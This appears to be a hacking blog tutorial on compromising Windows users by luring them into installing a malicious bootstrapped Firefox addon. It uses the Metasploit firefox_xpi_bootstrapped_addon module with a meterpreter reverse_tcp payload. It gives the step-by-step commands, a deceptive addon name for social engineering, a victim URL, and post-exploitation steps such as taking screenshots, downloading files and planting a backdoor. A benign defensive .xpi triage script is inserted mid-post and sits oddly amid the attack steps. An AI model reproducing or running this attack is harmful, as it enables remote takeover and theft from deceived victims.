Hey all. As we know, the number of Firefox users has increased rapidly these days, and users also like to use addons a lot for different purposes, such as removing timelines or making Firefox work better. So it is quite easy to use social engineering to fool your victim.
About This Vulnerability
This exploit dynamically creates a .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page. The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks "install", the addon is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the addon is marked to be "bootstrapped". As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.
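For defenders triaging a downloaded .xpi, the static check below is an added example, not code from the original post or from Metasploit. It assumes the legacy add-on layout (install.rdf carrying an em:bootstrap flag, bootstrap.js at the archive root, META-INF/mozilla.rsa in Mozilla-signed packages); the function names and the sample archive are constructed for illustration.

```python
import io
import re
import zipfile

# install.rdf marks a restartless add-on with em:bootstrap, written either
# as an element or as an RDF attribute.
BOOTSTRAP_RE = re.compile(
    r"<em:bootstrap>\s*true\s*</em:bootstrap>|em:bootstrap\s*=\s*[\"']true[\"']",
    re.IGNORECASE)

def triage_xpi(data):
    """Statically inspect raw .xpi bytes; nothing in the archive is executed."""
    findings = {"valid_zip": False, "bootstrapped": False,
                "has_bootstrap_js": False, "signed": False}
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with archive:
        names = archive.namelist()
        findings["valid_zip"] = True
        findings["has_bootstrap_js"] = "bootstrap.js" in names
        # Presence check only: the signature itself is not verified here.
        findings["signed"] = "META-INF/mozilla.rsa" in names
        if "install.rdf" in names:
            rdf = archive.read("install.rdf").decode("utf-8", errors="replace")
            findings["bootstrapped"] = bool(BOOTSTRAP_RE.search(rdf))
    return findings

def is_high_risk(findings):
    """Unsigned add-on that is marked bootstrapped and ships bootstrap.js."""
    return (findings["bootstrapped"] and findings["has_bootstrap_js"]
            and not findings["signed"])

def build_sample(bootstrap):
    """Constructed, inert sample archive (assumption: legacy layout)."""
    flag = "<em:bootstrap>true</em:bootstrap>" if bootstrap else ""
    rdf = ('<?xml version="1.0"?>\n'
           '<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n'
           '     xmlns:em="http://www.mozilla.org/2004/em-rdf#">\n'
           '  <Description about="urn:mozilla:install-manifest">\n'
           '    <em:id>sample@example.invalid</em:id>\n'
           f'    {flag}\n'
           '  </Description>\n</RDF>\n')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("install.rdf", rdf)
        z.writestr("bootstrap.js", "// constructed placeholder, no code\n")
    return buf.getvalue()

if __name__ == "__main__":
    for label, flag in (("bootstrapped", True), ("plain", False)):
        print(label, is_high_risk(triage_xpi(build_sample(flag))))
```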
Things Required
Attacker's Machine --> Backtrack 5
Victim's Machine --> Windows Machine
So let's start. Follow me.
1. Open the Metasploit Framework and select the Firefox XPI bootstrapped addon exploit.
So our command will be: use exploit/multi/browser/firefox_xpi_bootstrapped_addon
After that, set the payload of your choice. For this tutorial I will be using windows/meterpreter/reverse_tcp.
So our command will be: set payload windows/meterpreter/reverse_tcp
You should get something like what is shown in the image below.
2. OK, so now our exploit and payload are set, but we need to check whether all the options are correct. For that, use the show options command, which shows us everything necessary for this attack.
Now fill in all the required options.
In my case all the required options are filled in as shown in the image below.
Information about the options filled in -->
set addonname tweak firefox to load faster --> eye-catching name for social engineering purposes
set srvhost xxx.xxx.xxx --> IP address of your server that runs the exploit
set uripath firefox-tweaker --> makes the URL more friendly
set lhost xxx.xxx.xxx --> local IP address that receives the connection from the victim
3. If everything is filled in correctly, you can start your attack by using the exploit command.
Now send your URL to the victim. In my case the URL is http://192.168.174.130:8080/firefox-tweaker.
4. Our victim will get a screen similar to the one below.
5. Now, if the victim has successfully installed the addon, we can use the sessions -l command to see the session information.
We can do many things, like taking screenshots and downloading files, and we can also plant our backdoor for future use.
I hope you all enjoyed this tutorial. If you have any confusion or problems, you may ask in the comments.
IF YOU LIKED THIS POST THEN PLEASE COMMENT AND PLEASE DO NOT COPY